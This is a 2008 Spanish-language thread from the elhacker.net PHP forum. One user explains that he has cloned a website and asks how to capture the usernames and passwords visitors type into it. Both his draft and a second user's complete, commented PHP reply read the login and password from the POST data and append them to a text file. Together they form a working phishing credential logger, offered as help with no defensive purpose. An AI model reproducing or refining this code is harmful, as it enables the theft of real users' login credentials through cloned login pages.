elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Ayuda!!!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda!!!!  (Leído 1,338 veces)
kloki

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Ayuda!!!!
« en: 6 Septiembre 2008, 01:50 am »

 :D bueno gente de ante mano felicitarlos...

muy buen foro este acuden a cualquier duda que se imponga :)

mi problema se basa en  lo sigiente:

quiero crear un archivo php el cual tenga como ejemplo espesifico el guardar informacion en un .txt

es decir he copiado una pagina y quiero saber como le ago para que el php capture los users y password que en ella se escriban

trate de hacer uno basado en mi codigo pero.. no resulto de nada :/


header('Location: 'aca la web clonada');
$user=$_POST['login'];
$password=$_POST['password'];
$guarda=fopen("logs.txt",a);
fwrite($guarda,"
*******info********
User: ".$user."
Password: ".$password);
fclose($guarda);

-------------------------------------------------------------

porfavor hos pido que me pongan paso a paso como aserle para crear el php y me digan igual como aserle para colocar en el httm ocea como aserlo para que el php guarde los users en un txt


de antemano muchas gracias  ;D


En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: Ayuda!!!!
« Respuesta #1 en: 6 Septiembre 2008, 07:47 am »

Hola mira sería así, supongo que tienes el servidor montado y configurado, y sabes que hacer con el code  :¬¬

Código
  1. <?
  2. //capturas
  3. $user     = $_POST['login'];
  4. $password = $_POST['password'];
  5.  
  6. $Salto = chr(13).chr(10);
  7.  
  8. //-----------------------------------------------------------------------------------------------------------------
  9. //parametros para el manejo de los archivos
  10. //'r'   Solo lectura
  11. //'r+' Lectura y escritura
  12. //'w' Solo escritura
  13. //'w+' Lectura y escritura. Suprime el contenido anterior si se escribe. El archivo es creado si no existe.
  14. //'a' Solo escritura. El archivo es creado si no existe y el puntero se coloca al final.
  15. //'a+' Lectura y escritura. El archivo es creado si no existe y el puntero se coloca al final.
  16. //-----------------------------------------------------------------------------------------------------------------
  17.  
  18. //abrimos el archivo pasandole como parametros el patch del archivo y "a"
  19. $ar = fopen("c:\datos.txt","a") or die("Problemas en la creacion del archivo");
  20. //die --> detiene el script si ocurre un error al intentar crear el archivo
  21.  
  22. //fputs --> para grabar datos en el archivo, dos parametros necesarios, --> donde se guarda y que se guarda
  23. fputs($ar,"Usuario: $user");//escribimos el nombre capturado
  24. fputs($ar,$Salto);//le agregamos un separador
  25. fputs($ar,"pass: $password");//agregando los comentarios capturados
  26. fputs($ar,$Salto);// salto de linea (hay no me funciona)
  27. fputs($ar,"--------------------------------------------------------");
  28. fputs($ar,$Salto);
  29.  
  30. fclose($ar);//cerrando el archivo
  31.  
  32. //informando sobre la creacion del archivo
  33. echo "Los datos se agregaron correctamente";
  34. ?>

Este sería un .php que recibiría los datos del formulario de la pagina de logeo.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines